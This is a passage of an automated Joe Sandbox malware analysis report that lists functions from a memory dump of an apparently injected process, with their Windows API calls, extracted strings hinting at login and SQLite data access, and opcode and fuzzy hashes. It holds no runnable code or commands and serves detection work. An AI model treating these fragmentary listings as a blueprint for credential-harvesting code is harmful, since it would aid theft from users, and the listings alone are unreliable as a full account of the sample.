                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                          • String ID: ($d
                                                                                                                                                                                          • API String ID: 1140211610-1915259565
                                                                                                                                                                                          • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                          • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                          • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                          • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                          • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3015003838-0
                                                                                                                                                                                          • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                          • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                          • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                          • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 59245283-0
                                                                                                                                                                                          • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                          • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3467550082-0
                                                                                                                                                                                          • Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                          • Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                          • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                          • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                          • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                          • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                          • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                            • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                          • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                          • String ID: 3A
                                                                                                                                                                                          • API String ID: 3300951397-293699754
                                                                                                                                                                                          • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                          • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                          • String ID: strings
                                                                                                                                                                                          • API String ID: 3166385802-3030018805
                                                                                                                                                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                          • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                          • String ID: AE$.cfg$General$EA
                                                                                                                                                                                          • API String ID: 776488737-1622828088
                                                                                                                                                                                          • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                          • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                          • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                          • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                          • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                            • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                            • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                          • API String ID: 1028950076-4169760276
                                                                                                                                                                                          • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                          • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: -journal$-wal
                                                                                                                                                                                          • API String ID: 438689982-2894717839
                                                                                                                                                                                          • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                            • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3975816621-0
                                                                                                                                                                                          • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                          • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                          • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                            • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                            • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                          • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                          • API String ID: 1214746602-2708368587
                                                                                                                                                                                          • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                          • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                          • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                          • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                          • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                                                          • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                            • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2047574939-0
                                                                                                                                                                                          • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                          • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4218492932-0
                                                                                                                                                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00430C36 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
